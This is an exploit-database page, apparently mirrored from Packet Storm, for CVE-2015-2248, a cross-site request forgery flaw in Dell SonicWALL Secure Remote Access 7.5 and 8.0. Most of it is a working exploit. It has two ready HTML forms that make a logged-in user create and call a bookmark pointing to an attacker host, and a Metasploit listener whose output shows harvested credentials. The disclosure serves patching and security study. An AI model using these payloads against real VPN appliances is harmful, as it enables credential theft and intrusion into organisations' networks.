Dell SonicWALL Secure Remote Access 7.5 / 8.0 CSRF

🗓️ 05 May 2015 00:00:00Reported by Veit HailperinType

packetstorm🔗 packetstormsecurity.com👁 23 Views

Dell SonicWALL SRA CSRF vulnerability in versions 7.5 and 8.

Reporter	Title	Published	Views	Family All 8
CNVD	Dell SonicWALL Secure Remote Access Cross-Site Request Forgery Vulnerability	3 May 201500:00	–	cnvd
CVE	CVE-2015-2248	1 May 201515:00	–	cve
Cvelist	CVE-2015-2248	1 May 201515:00	–	cvelist
EUVD	EUVD-2015-2354	7 Oct 202500:30	–	euvd
NVD	CVE-2015-2248	1 May 201515:59	–	nvd
OpenVAS	Dell SonicWALL SMA 100 / SRA Series CSRF Vulnerability (SNWLID-2015-0001)	8 Feb 201700:00	–	openvas
Prion	Cross site request forgery (csrf)	1 May 201515:59	–	prion
SonicWall	Dell SonicWALL Secure Remote Access Products CVE-2015-2248 Cross Site Request Forgery Vulnerability	1 May 201515:59	–	sonicwall

`# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery  
# Date: 04/28/2015  
# Vendor Homepage: www.dell.com  
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv  
# CVE : 2015-2248  
  
Exploitation Procedure (Outline):  
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.  
2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.  
3. Gather the credentials on the target server provided in step #1   
  
1. Create a bookmark:  
  
<html>  
<body>  
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">  
<input type="hidden" name="bmName" value="foo" />  
<input type="hidden" name="host" value="www.malicious-host.tld" />  
<input type="hidden" name="description" value="bar" />  
<input type="hidden" name="tabs" value="Baz" />  
<input type="hidden" name="service" value="HTTP" />  
<input type="hidden" name="fbaSSOEnabled" value="on" />  
<input type="hidden" name="fbaSSOFormUserName" value="user" />  
<input type="hidden" name="fbaSSOFormUserPassword" value="password" />  
<input type="hidden" name="MC_App" value="inherit" />  
<input type="hidden" name="MC_Copy" value="inherit" />  
<input type="hidden" name="MC_Print" value="inherit" />  
<input type="hidden" name="MC_Offline" value="inherit" />  
<input type="hidden" name="name" value="name" />  
<input type="hidden" name="type" value="type" />  
<input type="hidden" name="owner" value="owner" />  
<input type="hidden" name="cmd" value="add" />  
<input type="hidden" name="wantBmData" value="true" />  
<input type="hidden" name="ok" value="OK" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
2. Call the newly created bookmark  
This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.  
  
<html>  
<body>  
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">  
<input type="hidden" name="HOST" value="www.malicious-host.tld" />  
<input type="hidden" name="bookmarkAccessed" value="4" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
3. Set up a listener  
E.g. metasploit payload   
use auxiliary/server/capture/http_basic  
  
msf auxiliary(http_basic) >   
[*] Listening on 0.0.0.0:80...  
[*] Using URL: http://0.0.0.0:80/  
[*] Local IP: http://www.malicious-host.tld:80/  
[*] Server started.  
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld  
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"  
  
  
  
`

05 May 2015 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.02685